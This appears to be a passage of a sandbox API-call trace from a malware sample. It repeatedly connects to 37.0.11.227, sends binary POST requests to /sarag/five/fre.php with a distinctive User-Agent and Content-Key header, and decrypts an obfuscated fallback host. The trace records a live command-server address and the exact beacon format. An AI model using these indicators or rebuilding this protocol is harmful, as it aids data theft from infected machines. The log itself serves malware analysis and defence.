RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0221.029] socket (af=2, type=1, protocol=6) returned 0x560 [0221.030] connect (s=0x560, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0221.056] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0221.056] GetProcessHeap () returned 0x690000 [0221.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0221.056] GetProcessHeap () returned 0x690000 [0221.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0221.057] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.057] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.057] GetProcessHeap () returned 0x690000 [0221.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0221.057] GetProcessHeap () returned 0x690000 [0221.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.058] GetProcessHeap () returned 0x690000 [0221.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0221.058] GetProcessHeap () returned 0x690000 [0221.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0221.059] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.060] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.060] GetProcessHeap () returned 0x690000 [0221.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0221.060] GetProcessHeap () returned 0x690000 [0221.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.062] send (s=0x560, buf=0x6ad508*, len=242, flags=0) returned 242 [0221.062] send (s=0x560, buf=0x6aba40*, len=159, flags=0) returned 159 [0221.062] GetProcessHeap () returned 0x690000 [0221.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0221.062] recv (in: s=0x560, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0221.134] GetProcessHeap () returned 0x690000 [0221.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0221.135] GetProcessHeap () returned 0x690000 [0221.135] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0221.136] GetProcessHeap () returned 0x690000 [0221.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0221.136] GetProcessHeap () returned 0x690000 [0221.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0221.136] closesocket (s=0x560) returned 0 [0221.137] GetProcessHeap () returned 0x690000 [0221.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0221.137] GetProcessHeap () returned 0x690000 [0221.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.137] GetProcessHeap () returned 0x690000 [0221.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0221.138] GetProcessHeap () returned 0x690000 [0221.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0221.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x970) returned 0x560 [0221.140] Sleep (dwMilliseconds=0xea60) [0221.147] GetProcessHeap () returned 0x690000 [0221.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0221.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.148] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.162] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0221.172] GetProcessHeap () returned 0x690000 [0221.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0221.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.174] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.175] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.176] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.176] GetProcessHeap () returned 0x690000 [0221.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0221.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.177] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0221.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.179] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.182] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0221.182] GetProcessHeap () returned 0x690000 [0221.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.184] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.185] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.187] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.188] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.188] GetProcessHeap () returned 0x690000 [0221.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0221.189] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.190] GetProcessHeap () returned 0x690000 [0221.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0221.191] GetProcessHeap () returned 0x690000 [0221.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.191] GetProcessHeap () returned 0x690000 [0221.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0221.192] GetProcessHeap () returned 0x690000 [0221.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0221.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0221.205] GetProcessHeap () returned 0x690000 [0221.205] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0221.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.206] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0221.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.207] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.207] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.207] GetProcessHeap () returned 0x690000 [0221.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0221.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.212] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0221.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.213] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0221.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.214] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0221.214] GetProcessHeap () returned 0x690000 [0221.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.215] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0221.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.216] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0221.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.218] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0221.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.219] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0221.219] GetProcessHeap () returned 0x690000 [0221.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0221.219] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0221.219] GetProcessHeap () returned 0x690000 [0221.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0221.219] socket (af=2, type=1, protocol=6) returned 0x564 [0221.219] connect (s=0x564, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0221.244] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0221.244] GetProcessHeap () returned 0x690000 [0221.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0221.244] GetProcessHeap () returned 0x690000 [0221.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0221.245] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.246] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.246] GetProcessHeap () returned 0x690000 [0221.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0221.246] GetProcessHeap () returned 0x690000 [0221.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.246] GetProcessHeap () returned 0x690000 [0221.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0221.246] GetProcessHeap () returned 0x690000 [0221.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0221.247] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.248] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.248] GetProcessHeap () returned 0x690000 [0221.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0221.248] GetProcessHeap () returned 0x690000 [0221.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0221.249] send (s=0x564, buf=0x6ab500*, len=242, flags=0) returned 242 [0221.250] send (s=0x564, buf=0x6aba40*, len=159, flags=0) returned 159 [0221.250] GetProcessHeap () returned 0x690000 [0221.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0221.250] recv (in: s=0x564, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0221.339] GetProcessHeap () returned 0x690000 [0221.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0221.340] GetProcessHeap () returned 0x690000 [0221.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0221.340] GetProcessHeap () returned 0x690000 [0221.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0221.340] GetProcessHeap () returned 0x690000 [0221.340] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0221.341] closesocket (s=0x564) returned 0 [0221.341] GetProcessHeap () returned 0x690000 [0221.341] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0221.341] GetProcessHeap () returned 0x690000 [0221.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.342] GetProcessHeap () returned 0x690000 [0221.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0221.342] GetProcessHeap () returned 0x690000 [0221.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0221.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x88c) returned 0x564 [0221.363] Sleep (dwMilliseconds=0xea60) [0221.367] GetProcessHeap () returned 0x690000 [0221.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0221.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.377] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0221.386] GetProcessHeap () returned 0x690000 [0221.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0221.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.387] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0221.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.389] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.391] GetProcessHeap () returned 0x690000 [0221.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0221.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.396] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0221.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.397] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0221.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.398] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0221.398] GetProcessHeap () returned 0x690000 [0221.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.400] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.401] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.402] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.402] GetProcessHeap () returned 0x690000 [0221.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0221.402] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.402] GetProcessHeap () returned 0x690000 [0221.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0221.402] GetProcessHeap () returned 0x690000 [0221.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.403] GetProcessHeap () returned 0x690000 [0221.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0221.403] GetProcessHeap () returned 0x690000 [0221.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0221.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.404] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0221.416] GetProcessHeap () returned 0x690000 [0221.416] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0221.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.417] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0221.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.418] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.419] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.419] GetProcessHeap () returned 0x690000 [0221.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0221.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.420] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0221.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.421] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0221.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.422] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0221.422] GetProcessHeap () returned 0x690000 [0221.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0221.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.425] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0221.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.427] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0221.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.428] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0221.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.429] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0221.429] GetProcessHeap () returned 0x690000 [0221.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0221.429] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0221.429] GetProcessHeap () returned 0x690000 [0221.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0221.429] socket (af=2, type=1, protocol=6) returned 0x568 [0221.430] connect (s=0x568, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0221.454] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0221.455] GetProcessHeap () returned 0x690000 [0221.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0221.455] GetProcessHeap () returned 0x690000 [0221.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0221.455] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0221.458] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.459] GetProcessHeap () returned 0x690000 [0221.459] RtlAllocateHeap 